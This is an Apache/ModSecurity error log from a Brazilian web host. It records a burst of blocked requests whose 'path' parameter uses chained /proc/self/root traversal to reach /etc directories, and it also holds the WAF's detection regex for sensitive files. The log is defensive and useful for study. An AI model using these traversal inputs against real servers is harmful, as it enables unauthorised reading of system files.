[Fri Mar 20 02:45:31.366553 2026] [:error] [pid 8307:tid 140411733534464] [client 74.7.243.128:50726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze-7-FhjpZGs9ba8qqygAAAwE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:33.846313 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:47446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze_RCii7xarUs8iHYoxgAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:37.614814 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:33630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfAQF0L0L-SsrnPo4uoAAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:39.726176 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:50732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfAvu8EFLIOrSqIpvlhAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:40.865764 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:33638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfBPXLqtnMIWvjpaJd2gAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:43.039189 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:33654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfBxCii7xarUs8iHYo0gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:46.749866 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:33670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfChCii7xarUs8iHYo2AAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:47.767545 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:50732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfC_u8EFLIOrSqIpvlkQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:49.137807 2026] [proxy_fcgi:error] [pid 31215:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59460] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:45:49.526978 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:57398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfDeoXxyEfFpUF8f9KxwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:50.525517 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:57398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfDuoXxyEfFpUF8f9KyQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:51.999762 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:57398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfD-oXxyEfFpUF8f9KygAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:54.916193 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:57412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfEfqxLDW4GITHUkSo7gAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:56.271139 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:52550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfFAF0L0L-SsrnPo4usQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:56.936971 2026] [:error] [pid 8307:tid 140411574073088] [client 74.7.241.31:57424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfFL-FhjpZGs9ba8qq1gAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:58.445277 2026] [core:alert] [pid 30424:tid 140411624429312] [client 74.7.243.128:52560] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib
[Fri Mar 20 02:45:59.863050 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:56512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfF-oXxyEfFpUF8f9KzwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:09.007747 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:56514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfIfqxLDW4GITHUkSo_AAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:10.400210 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:52572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfIvqxLDW4GITHUkSo_QAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:46:13.129793 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60052] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:46:15.310909 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:36578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfJgkwaGbbGflqUZALNQAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:18.818197 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:43002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfKvu8EFLIOrSqIpvlnwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:19.265443 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:46612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfK9a6ubjKNq_cu4aU0wAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:46:22.452848 2026] [:error] [pid 30424:tid 140411565680384] [client 74.7.241.31:43018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzfLst36Dv4L1GW-s-erwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:46:27.515038 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:42928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 